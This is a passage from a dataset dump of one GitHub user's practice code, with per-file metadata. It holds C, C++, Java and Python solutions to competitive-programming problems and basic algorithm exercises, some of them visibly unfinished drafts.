'p')\n\t{\n\t\tli->push(2);\n\t\tli->push(8);\n\t\tli->push(10);\n\t\tli->push(1);\n\t\t\n\t\tli->printlist();\n\t}\n\telse if(c == 'a')\n\t{\n\t\tli->append(2);\n\t\tli->append(4);\n\t\tli->append(6);\n\t\tli->append(9);\n\t\t\n\t\tli->printlist();\n\t}\n\n}\n\n" }, { "alpha_fraction": 0.4451901614665985, "alphanum_fraction": 0.48769575357437134, "avg_line_length": 16.625, "blob_id": "ba845b0c2abdeeb5e34a5073bc329616e4c1e796", "content_id": "bbe1a57145f3c4e719359d258f0b30cc26492a86", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 447, "license_type": "permissive", "max_line_length": 35, "num_lines": 24, "path": "/python/HPOJ/Ex-5/Aman and lab file work.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 20 15:06:01 2020\n\n@author: teja\n\"\"\"\n\nn = int(input())\nt = []\nd = []\nans = []\nfor i in range(n):\n temp = list(input().split())\n t.append(temp[0])\n d.append(temp[1])\nfor i in range(len(t)): \n minval = min(t)\n minind = t.index(minval)\n ans.append()\n for i in range(minind):\n t.append(t.pop(0))\n d.append(d.pop(0))\n t.pop(0)\n d.pop(0)\n \n\n \n \n " }, { "alpha_fraction": 0.42670536041259766, "alphanum_fraction": 0.4542815685272217, "avg_line_length": 21.066667556762695, "blob_id": "8bc41befe81c867e6739e54030f6d19c65c7bde6", "content_id": "78924ef8eb8b308b6e4ea4e96eebda0a1a049775", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 689, "license_type": "permissive", "max_line_length": 57, "num_lines": 30, "path": "/python/HPOJ/Ex-5/HPOJ Book Exercises.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 20 14:14:26 2020\n\n@author: teja\n\"\"\"\n\nn = int(input())\nval = []\nsub = []\nfor i in range(n):\n temp = list(input().split())\n #print(temp)\n if(int(temp[0]) != -1):\n val.append(int(temp[0]))\n sub.append(temp[1])\n #print(val)\n #print(sub)\n else:\n minval = min(val)\n minind = val.index(minval)\n leng = len(val)\n #print(minind)\n subneed = \"\"\n for j in range(len(val), minind, -1):\n #val.pop()\n subneed = sub.pop()\n val.pop()\n #print(subneed)\n print(str(leng - minind -1) + \" \" + str(subneed))\n \n \n \n " }, { "alpha_fraction": 0.4041237235069275, "alphanum_fraction": 0.4329896867275238, "avg_line_length": 11.75, "blob_id": "b10d33086d563885d97bf76344d8ec2912b1537e", "content_id": "3d377d6843fd9e65c137b9c8940e81a161b6b79a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 970, "license_type": "permissive", "max_line_length": 73, "num_lines": 76, "path": "/April Long_2020/Squared Subsequences_BruteForce.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint checksum(int i, int j, vector<int> vec, int prev, vector<int>&lenval)\n{\n\tint sum = 0, it;\n\tif(i == 1)\n\t{\n\t\tsum = vec[j];\n\t\tif(j == 0)\n\t\t{\n\t\t\tlenval[i-1] = sum;\t\n\t\t}\n\t}\n\telse if(j == 0)\n\t{\n\t\tsum = lenval[i-1-1] + vec[i-1];\n\t\tlenval[i-1] = sum;\n\t}\n\telse\n\t{\n\t\tif(vec[i+j-1] == 0)\n\t\t{\n\t\t\treturn (prev - vec[j-1]);\n\t\t}\n\t\telse \n\t\t{\n\t\t\treturn (prev + vec[i+j-1] - vec[j-1]);\n\t\t}\n\t}\n\n\treturn sum;\n}\n\nint main()\n{\n\tint t, n, i, j,temp;\n\tcin >> t; \n\twhile(t--)\n\t{\n\t\tint ans = 0;\n\t\tcin >> n;\n\t\tvector<int>vec(n);\n\t\tvector<int>lenval(n);\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> temp;\n\t\t\tif(temp % 4 == 0)\n\t\t\t{\n\t\t\t\tvec[i] = 2;\n\t\t\t}\n\t\t\telse if(temp%2 != 0)\n\t\t\t{\n\t\t\t\tvec[i] = 0;\t\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tvec[i] = 1;\n\t\t\t}\n\t\t}\n\t\tint ret = 0, prev = 0;\n\t\tfor(i=1;i<=n;i++)\t\n\t\t{\n\t\t\tfor(j=0;j<=n-i;j++)\n\t\t\t{\n\t\t\t\tret = checksum(i, j, vec, prev, lenval);\n\t\t\t\tprev = ret;\n\t\t\t\tif(ret != 1)\n\t\t\t\t{\n\t\t\t\t\t++ans;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tcout << ans << \"\\n\";\n\t}\n}\n\n" }, { "alpha_fraction": 0.43127962946891785, "alphanum_fraction": 0.44549763202667236, "avg_line_length": 13.066666603088379, "blob_id": "149a59a9c11472cde1f37779d7fecec4067aafa8", "content_id": "978929652a9397c2c63656b9e35f0d51e05c5069", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 211, "license_type": "permissive", "max_line_length": 23, "num_lines": 15, "path": "/C/INTEST.c", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<stdio.h>\n\tint main(){\n\t\tint n,i,count=0;\n\t\tint k;\n\t\tscanf(\"%d %d\",&n,&k);\n\t\tint arr[n];\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tscanf(\"%d\",&arr[i]);\n\t\t\tif(arr[i]%k==0){\n\t\t\t\t++count;\n\t\t\t}\n\t\t}\n\t\tprintf(\"%d\",count);\n\t}\n" }, { "alpha_fraction": 0.5216346383094788, "alphanum_fraction": 0.5336538553237915, "avg_line_length": 17.863636016845703, "blob_id": "6e7e4d079312e95757478885c25fe02b3f2217c8", "content_id": "562363d1616f433e5126de5d62257ae5155850c7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 416, "license_type": "permissive", "max_line_length": 41, "num_lines": 22, "path": "/Java/MAGICJAR.java", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "\nimport java.util.*;\nimport java.math.*;\nclass interactiveProblen {\n\tpublic static void main(String[] args) {\n\t\tScanner sc = new Scanner(System.in);\n\t\tint t;\n\t\tt= sc.nextInt();\n\t\twhile(t-- != 0)\n\t\t{\n\t\t\tint n,i;\n\t\t\tlong count = 0;\n\t\t\tn = sc.nextInt();\n\t\t\tlong [] a = new long[n];\n\t\t\tfor(i = 0 ; i< n ; i++)\n\t\t\t{\n\t\t\t\ta[i] = sc.nextLong();\n\t\t\t\tcount = count + (a[i] - 1);\n\t\t\t}\n\t\t\tSystem.out.println(count+1);\n\t\t}\t\t\n}\n}\n" }, { "alpha_fraction": 0.27283236384391785, "alphanum_fraction": 0.342196524143219, "avg_line_length": 13.180327415466309, "blob_id": "8649788f6e781e08bbac07e3f0771ff295e1cf85", "content_id": "1ad94df3eedd34a67ad839e3b08f9d86316087e0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 865, "license_type": "permissive", "max_line_length": 70, "num_lines": 61, "path": "/C++/DP/max sqr matrix in a given matrix.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nvoid printMaxSubSquare( int m[6][5])\n{\n\tint ans[6][5];\n\tint i,j;\n\tfor(i=0;i<6;i++)\n\t{\n\t\tans[i][0] = m[i][0];\n\t}\n\tfor(i=0;i<5;i++)\n\t{\n\t\tans[0][i] = m[0][i];\n\t}\n\t\n\t\n\tfor(i=1;i<6;i++)\n\t{\n\t\tfor(j=1;j<5;j++)\n\t\t{\n\t\t\tif(m[i][j] == 1)\n\t\t\t{\n\t\t\t\tans[i][j] = 1 + min(ans[i][j-1], min(ans[i-1][j], ans[i-1][j-1]));\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tans[i][j] = 0;\n\t\t\t}\n\t\t}\n\t}\n\t\n\tint size = 0;\n\t\n\tfor(i=0;i<6;i++)\n\t{\n\t\tfor(j=0;j<5;j++)\n\t\t{\tcout << ans[i][j] << \"\\t\";\n\t\t\tif(size < ans[i][j])\n\t\t\t{\n\t\t\t\tsize = ans[i][j];\n\t\t\t}\n\t\t}\n\t\tcout << \"\\n\";\n\t}\n\t\n\tcout << size;\n}\n\n\nint main()\n{\n\t int M[6][5] = {{0, 1, 1, 0, 1}, \n {1, 1, 0, 1, 0}, \n {0, 1, 1, 1, 0}, \n {1, 1, 1, 1, 0}, \n {1, 1, 1, 1, 1}, \n {0, 0, 0, 0, 0}}; \n \n printMaxSubSquare(M);\n}\n" }, { "alpha_fraction": 0.3921568691730499, "alphanum_fraction": 0.40392157435417175, "avg_line_length": 10.590909004211426, "blob_id": "71d906cd41a6053a6ec1eff527dde1df6db2e778", "content_id": "d45e09f40060d7a701fdb198e331a3d22f2a9436", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 255, "license_type": "permissive", "max_line_length": 23, "num_lines": 22, "path": "/C++/Non-zero.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint t, n, i;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tcin >> n;\n\t\tvector< int >a(n);\n\t\tfor(i=0; i<n; i++)\n\t\t{\n\t\t\tcin >> a[i];\n\t\t}\n\t\tint sum = 0;\n\t\tfor(i=0; i<n; i++)\n\t\t{\n\t\t\tif(a[i] > )\n\t\t}\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t}\n}\n" }, { "alpha_fraction": 0.4748201370239258, "alphanum_fraction": 0.5179855823516846, "avg_line_length": 10.416666984558105, "blob_id": "cedae41d22aef770b48bc4e2d054d647d15741a9", "content_id": "6a4e66e9f91301bfe9678f26d71f62a90334d1cb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 139, "license_type": "permissive", "max_line_length": 23, "num_lines": 12, "path": "/C++/pointer test.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint a = 10;\n\tcout << a << \"\\n\";\n\tint* ptr = &a;\n\t*ptr = 100;\n\t\t\n\treturn 0;\n}\n\n\n" }, { "alpha_fraction": 0.49642857909202576, "alphanum_fraction": 0.5214285850524902, "avg_line_length": 19.01785659790039, "blob_id": "51108c45b53a9096260afc46848fc4e20127518b", "content_id": "5a33190210299f3f97f849cb8c58be8c97f471ae", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1120, "license_type": "permissive", "max_line_length": 40, "num_lines": 56, "path": "/python/Linkedlist/linklist creation.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 15 15:27:51 2019\n\n@author: teja\n\"\"\"\n\nclass Node:\n def __init__(self, new_data):\n self.data = new_data\n self.next = None\n\nclass Linkedlist:\n def __init__(self):\n self.head = None\n self.tail = None\n self.len = 0\n \n def push(self, data):\n new_node = Node(data)\n new_node.next = self.head\n self.head = new_node\n \n def append(self,data):\n new_node = Node(data)\n if self.len == 0:\n new_node.next = None\n self.head = new_node\n self.tail = new_node\n self.len = self.len + 1\n else:\n self.tail.next = new_node\n self.tail = new_node\n new_node.next = None\n \n def printlist(self):\n temp = self.head\n while(temp):\n print(temp.data, end=' -> ')\n temp = temp.next\n\n\n\nllist = Linkedlist()\n#llist.push(20)\n#llist.push(2)\n#llist.push(1)\n#llist.push(5)\n#llist.push(9)\n\nllist.append(20)\nllist.append(2)\nllist.append(1)\nllist.append(5)\nllist.append(9)\nllist.printlist()" }, { "alpha_fraction": 0.421658992767334, "alphanum_fraction": 0.44930875301361084, "avg_line_length": 15.358490943908691, "blob_id": "fa91ac52cca07b19e09366f32d30f0310f65bde9", "content_id": "0519641eaf8936083378b2d12347d277c3efd24a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 868, "license_type": "permissive", "max_line_length": 44, "num_lines": 53, "path": "/Java/CHEFING.java", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "\nimport java.util.*;\nimport java.math.*;\n class interactiveProblen {\n\tpublic static void main(String[] args) {\n\t\tScanner sc = new Scanner(System.in);\n\t\tint t;\n\t\tt= sc.nextInt();\n\t\twhile(t-- != 0)\n\t\t{\n\t\t\tint n,i,j,k,count =0 ;\n\t\t\tn = sc.nextInt();\n\t\t\tString[] s = new String[n];\n\t\t\tint[] flag = new int[26];\n\t\t\tint[] count1 = new int[26];\n\t\t\ts[0] = sc.nextLine();\n\t\t\tfor(i=0;i<n;i++)\n\t\t\t{\n\t\t\t\ts[i] = sc.nextLine();\n\t\t\t}\n\t\t\tfor(i=0;i<n;i++)\n\t\t\t{\n\t\t\t\tfor(j=0;j<s[i].length();j++)\n\t\t\t\t{\n\t\t\t\t\tint a = (int)s[i].charAt(j) - (int)'a';\n\t\t\t\t\t//System.out.println(\"a value is \"+a );\n\t\t\t\t\tif(flag[a] == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tcount1[a] = count1[a] + 1;\n\t\t\t\t\t\tflag[a] = 1;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tfor(k=0;k<26;k++)\n\t\t\t\t{\n\t\t\t\t\tflag[k] = 0;\n\t\t\t\t}\n\t\t\t}\n\t\t\tfor(i=0;i<26;i++)\n\t\t\t{\n\t\t\t\tif(count1[i] == n)\n\t\t\t\t{\n\t\t\t\t\t++count;\n\t\t\t\t}\n\t\t\t}\n\t\t\tSystem.out.println(count);\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t}\t\t\n}\n}\n" }, { "alpha_fraction": 0.37080636620521545, "alphanum_fraction": 0.4102413058280945, "avg_line_length": 13.756522178649902, "blob_id": "09aacafed0c7c1f6bfb32cb69776f45213c395b8", "content_id": "9110b2d688c1b5aa1d243ad48514372afcf52854", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1699, "license_type": "permissive", "max_line_length": 67, "num_lines": 115, "path": "/April Long_2020/Squared Squences_Optimized.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nlong long findsum(long long index, long long length, long long odd)\n{\n\tif(odd == 0)\n\t{\n\t\tif(index <= (length/2))\n\t\t{\n\t\t\treturn ((index) * ((2*length) + (index-1) * -2))/2;\n\t\t}\n\t\telse\n\t\t{\n\t\t\tindex = length - index + 1;\n\t\t\treturn ((index) * ((2*length) + (index-1) * -2))/2;\n\t\t}\n\t}\n\telse\n\t{\n\t\tif(index <= (length/2) + 1)\n\t\t{\n\t\t\treturn ((index) * ((2*length) + (index-1) * -2))/2;\n\t\t}\n\t\telse\n\t\t{\n\t\t\tindex = length - index + 1;\n\t\t\treturn ((index) * ((2*length) + (index-1) * -2))/2;\n\t\t}\n\t}\n}\n\nint main()\n{\n\tlong long t, n, i, j;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tcin >> n;\n\t\tvector<long long>ele(n);\n\t\tvector<long long>div2;\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> ele[i];\n\t\t\tif(ele[i] % 2 == 0)\n\t\t\t{\n\t\t\t\tdiv2.push_back(i+1);\n\t\t\t}\n\t\t}\n\t\tlong long fi = (n * (n+1)) / 2;\n\t\tlong long s = div2.size(), sub = 0;\n\t\tlong long l = 1, r = n;\n\t\tlong long odd = 0;\n\n\t\tlong long len , ret;\n\t\tfor(i=0;i<s;i++)\n\t\t{\n\t\t\tif(ele[div2[i]-1] % 4 == 0)\n\t\t\t{\n\t\t\t\tl = div2[i]+1;\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tif(i == s-1)\n\t\t\t{\n\t\t\t\tr = ele.size();\n\t\t\t\tlen = r - l +1;\n\t\t\t\tif(len%2 != 0)\n\t\t\t\t{\n\t\t\t\t\todd = 1;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\todd = 0;\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tif(div2[i] == l || div2[i] == r)\n\t\t\t\t{\n\t\t\t\t\tret = len;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tret = findsum(div2[i] - l + 1, len, odd);\t\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tsub = sub + ret;\n\t\t\t\tl = div2[i] + 1;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tr = div2[i+1] - 1;\n\t\t\t\tlen = r - l +1;\n\t\t\t\tif(len%2 != 0)\n\t\t\t\t{\n\t\t\t\t\todd = 1;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\todd = 0;\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tif(div2[i] == l || div2[i] == r)\n\t\t\t\t{\n\t\t\t\t\tret = len;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tret = findsum(div2[i] - l + 1, len, odd);\t\n\t\t\t\t}\n\t\t\t\tsub = sub + ret;\n\t\t\t\tl = div2[i] + 1;\n\t\t\t}\n\n\t\t}\n\t\tcout << fi - sub << \"\\n\";\n\t}\n}\n\n\n" }, { "alpha_fraction": 0.6005089282989502, "alphanum_fraction": 0.6386768221855164, "avg_line_length": 22.176469802856445, "blob_id": "97a6c0ac700b78d62efc216586b56cdfb33123b7", "content_id": "abc9f9c811b2914ae6f3e176cb6069a20f13baa1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 393, "license_type": "permissive", "max_line_length": 107, "num_lines": 17, "path": "/python/CIR Ques.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 9 17:44:54 2020\n\n@author: teja\n\"\"\"\n\nex_str = \"God has created the universe so beautiful that the description of it can be represented in lisp.\"\nex_str = ex_str[:-1]\n\nprint(ex_str)\n\nex_list = list(map(lambda x: x.lower(), ex_str.split()))\nex_list.sort(key=lambda x: len(x))\nex_list[0] = ex_list[0].title()\nres = \" \".join(ex_list) + \".\"\nprint(res)" }, { "alpha_fraction": 0.38730451464653015, "alphanum_fraction": 0.41030359268188477, "avg_line_length": 14.768115997314453, "blob_id": "edcea530e61ece6da2b8cc0251717cf8cbf7868b", "content_id": "2cac1a9f2d8a5d3824a34c2f5d374e8da56808f4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1087, "license_type": "permissive", "max_line_length": 52, "num_lines": 69, "path": "/C++/JAIN.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\t//ios_base::sync_with_stdio(false);\n\t//cin.tie(NULL);\n\t\n\tint t;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tlong n;\n\t\tlong i,j,k = 32;\n\t\tcin >> n;\n\t\tunsigned int tmp;\n\t\t//vector< unsigned long long > map(n,0);\n\t\tvector< long > bitcount(k,0);\n\t\tlong count = 0;\n\t\tstring s;\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> s;\n\t\t\tlong long len = s.length();\n\t\t\ttmp = 0;\n\t\t\tfor(j=0;j<len;j++)\n\t\t\t{\n\t\t\t\tswitch(s[j])\n\t\t\t\t{\n\t\t\t\t\tcase 'a': tmp = (tmp | 16);\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t\t\n\t\t\t\t\tcase 'e': tmp = (tmp | 8);\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t\t\n\t\t\t\t\tcase 'i': tmp = (tmp | 4);\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t\t\n\t\t\t\t\tcase 'o': tmp = (tmp | 2);\n\t\t\t\t\t\t\t\tbreak;\n\t\t\n\t\t\t\t\tcase 'u': tmp = (tmp | 1);\n\t\t\t\t\t\t\t\tbreak;\t\t\t\t\n\t\t\t\t}\t\n\t\t\t}\n\t\t\t++bitcount[tmp];\n\t\t}\n\t\t\n\t\tlong long res = 0;\n\t\tfor(i=0;i<32;i++)\n\t\t{\n\t\t\tfor(j=0;j<32;j++)\n\t\t\t{\n\t\t\t\tif((i | j) == 31)\n\t\t\t\t{\n\t\t\t\t\t\n\t\t\t\t\tif(i == j)\n\t\t\t\t\t{\n\t\t\t\t\t\tres = res + (bitcount[i] * (bitcount[i] - 1));\n\t\t\t\t\t\tcontinue;\n\t\t\t\t\t}\n\t\t\t\t\tres = res + (bitcount[i]*bitcount[j]);\n//\t\t\t\t\t\tcout << i << \" \" << j << \" \";\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tcout << (res/2) << \"\\n\";\n\t}\n}" }, { "alpha_fraction": 0.25473934412002563, "alphanum_fraction": 0.28080567717552185, "avg_line_length": 11.5820894241333, "blob_id": "8838c86c2bcd351d72dbf20cac9a477bc4a36551", "content_id": "f00f66440dc1ee9a3231afab38ba1e9e17a1d9cb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 844, "license_type": "permissive", "max_line_length": 51, "num_lines": 67, "path": "/April Long_2020/Unit GCD - version 3 - Efficient one.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint t, n, count, i;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tcin >> n;\n\t\tcount = 3;\n\t\tif(n < 3)\n\t\t{\n\t\t\tcount = n;\n\t\t}\n\t\tint days = n/2;\n\t\tif(days == 0)\n\t\t{\n\t\t\tdays = 1;\n\t\t}\n\t\tcout << days << \"\\n\";\n\t\tcout << count << \" \";\n\t\tif(n <= 3)\n\t\t{\n\t\t\tfor(i = 1;i<=n;i++)\n\t\t\t{\n\t\t\t\tcout << i << \" \";\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tif(n%2 != 0)\n\t\t\t{\n\t\t\t\tfor(i = 1;i<=3;i++)\n\t\t\t\t{\n\t\t\t\t\tcout << i << \" \";\n\t\t\t\t}\n\t\t\t\tcout << \"\\n\";\n\t\t\t\tfor(i=4;i<=n;i+=2)\n\t\t\t\t{\n\t\t\t\t\tcout << 2 << \" \" << i << \" \" << i+1 << \"\\n\";\n\t\t\t\t}\t\t\t\t\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tfor(i = 1;i<=3;i++)\n\t\t\t\t{\n\t\t\t\t\tcout << i << \" \";\n\t\t\t\t}\n\t\t\t\tcout << \"\\n\";\n\t\t\t\tfor(i=4;i<=n;i+=2)\n\t\t\t\t{\n\t\t\t\t\tif(i == n)\n\t\t\t\t\t{\n\t\t\t\t\t\tcout << 1 << \" \" << i << \"\\n\";\t\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tcout << 2 << \" \" << i << \" \" << i+1 << \"\\n\";\t\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t}\t\t\t\n\t\t\t}\n\t\t}\t\t\t\n\t}\n\n}\n\n" }, { "alpha_fraction": 0.46000000834465027, "alphanum_fraction": 0.4928571283817291, "avg_line_length": 13.5625, "blob_id": "59ac4e1eae4e7ad27633faabd2dc3f458462f6bf", "content_id": "dff10d85adb3d9bf8f9629d140b8fc58f4ca1067", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 700, "license_type": "permissive", "max_line_length": 64, "num_lines": 48, "path": "/C++/FlyodWarshall-AllPairShortestPath.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n#define max 99999\n#define siz 4\n\n\n//All pair shortest path\n//The final matrix shows the shortest dist from x node to y node\n// Complexity is n^3\n\nvoid floydWarshall(int matrix[][siz])\n{\n\tint i, j, k;\n\tfor(k = 0;k < siz; k++)\n\t{\n\t\tfor(i = 0; i < siz; i++)\n\t\t{\n\t\t\tfor(j = 0; j < siz; j++)\n\t\t\t{\n\t\t\t\tmatrix[i][j] = min(matrix[i][j], matrix[i][k]+matrix[k][j]);\n\t\t\t}\n\t\t}\n\t}\n\n\t\n\t\n\t\n\tfor(i=0;i<siz;i++)\n\t{\n\t\tfor(j=0;j<siz;j++)\n\t\t{\n\t\t\tcout << matrix[i][j] << \"\\t\";\n\t\t}\n\t\tcout << \"\\n\";\n\t}\n}\n\nint main()\n{\n\tint matrix[siz][siz] = {\n\t\t\t\t\t\t\t{0, 3, max, 7},\n\t\t\t\t\t\t\t{8, 0, 2, max},\n\t\t\t\t\t\t\t{5, max, 0, 1},\n\t\t\t\t\t\t\t{2, max, max, 0}\n\t\t\t\t\t\t };\n\n\tfloydWarshall(matrix);\n}\n\n" } ]
84
yanchuga/first
https://github.com/yanchuga/first
dd4936a43783cc9f97c2b1ff9a8a0a745a35b1e6
30a745a4bb52d3d68dc532a015599fd1f4116c9e
0b99b7fe0be6b7d2661132c20212ce6cda7f27ba
refs/heads/master
2021-01-19T10:28:32.502233
2017-04-18T10:56:52
2017-04-18T10:56:52
87,869,580
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6364436745643616, "alphanum_fraction": 0.658450722694397, "avg_line_length": 31.457143783569336, "blob_id": "eb4b2defdbd19d7220134c60d35e08396b8f8c00", "content_id": "f7352eaf13edf981f6e383584f7b1d5b60b089ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1143, "license_type": "no_license", "max_line_length": 80, "num_lines": 35, "path": "/students/views.py", "repo_name": "yanchuga/first", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\n#view for Students\ndef students_list(request):\n students = (\n {'id':1,\n 'first_name': u'Виталий',\n 'last_name': u'Podoba',\n 'ticket': 235,\n 'image': 'img/podoba3.jpg'},\n {'id':2,\n 'first_name': u'Yan',\n 'last_name': u'Khadzhyisky',\n 'ticket': 2135,\n 'image': 'img/piv.png'},\n )\n return render(request, 'students/students_list.html', {'students':students})\ndef students_add(request):\n return HttpResponse('<h1>Students Add Form</h1>')\ndef students_edit(request, sid):\n return HttpResponse('<h1>Students Edit %s Form</h1>' % sid)\ndef students_delete(request, sid):\n return HttpResponse('<h1>Students Delete %s Form</h1>' % sid)\n\n#view for Groups\ndef groups_list(request):\n return HttpResponse('<h1>Groups List Form</h1>')\ndef groups_add(request):\n return HttpResponse('<h1>Groups Add Form</h1>')\ndef groups_edit(request, gid):\n return HttpResponse('<h1>Groups Edit %s Form</h1>' % gid)\ndef groups_delete(request, gid):\n return HttpResponse('<h1>Groups Delete %s Form</h1>' % gid)\n" } ]
1
darklatiz/writter-notebook
https://github.com/darklatiz/writter-notebook
35790ff2c8af36a141d4dc205024f96eb1146a83
0d57ca5134cac605911f9c911c1bbe72f749c519
a5e915a87f94cb3808c90ba5aef40d45912ee41f
refs/heads/master
2021-05-26T02:04:19.514977
2020-04-18T18:04:37
2020-04-18T18:04:37
254,010,806
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5341026782989502, "alphanum_fraction": 0.5409750938415527, "avg_line_length": 36.99014663696289, "blob_id": "a9997eb52bef83771c07e2c0b58cff03a2d155ba", "content_id": "e8cf440e5121f69a5f7c1025f016af7c8ef82f5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7712, "license_type": "no_license", "max_line_length": 116, "num_lines": 203, "path": "/ui/maze.py", "repo_name": "darklatiz/writter-notebook", "src_encoding": "UTF-8", "text": "import PyQt5\nfrom PyQt5 import QtGui\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QMenu, qApp, QAction, QMessageBox\nfrom PyQt5.QtGui import QPainter, QBrush, QPen, QIcon, QKeySequence\nfrom PyQt5.QtCore import Qt, QPoint\nimport math\nfrom things.Cell import Cell\nfrom collections import deque\nimport random\nimport time\nimport sys\n\n\nclass MazeGenerator(QMainWindow):\n '''\n Recursive BAckTacker\n '''\n\n def __init__(self, width=900, height=900, weight=3, top=150, left=150):\n QMainWindow.__init__(self)\n self.title = \"PyQt5 Drawing Rectangle\"\n self.top = top\n self.left = left\n self.width = width\n self.height = height\n self.grid = None\n self.w = weight\n self.init_window()\n self.rows = math.floor(self.width / self.w)\n self.columns = math.floor(self.width / self.w)\n self.back_tracker = deque()\n self.path = []\n self.current = None\n self.func = (None, None)\n self.grid_painted = False\n\n self.grid = self.__create_2d_array(self.rows, self.columns)\n\n for i in range(len(self.grid)):\n for j in range(len(self.grid[0])):\n self.grid[i][j] = Cell(i, j)\n self.back_tracker.append(self.grid[math.floor(self.rows / 2) + 1][math.floor(self.columns / 2)])\n\n self.func = (None, None)\n self.mModified = True\n\n # self.create_actions()\n # self.create_tool_bars()\n\n def init_window(self):\n self.setWindowIcon(QtGui.QIcon(\"icon.png\"))\n self.setWindowTitle(self.title)\n self.setGeometry(self.top, self.left, self.width, self.height)\n self.show()\n\n def create_actions(self):\n root = 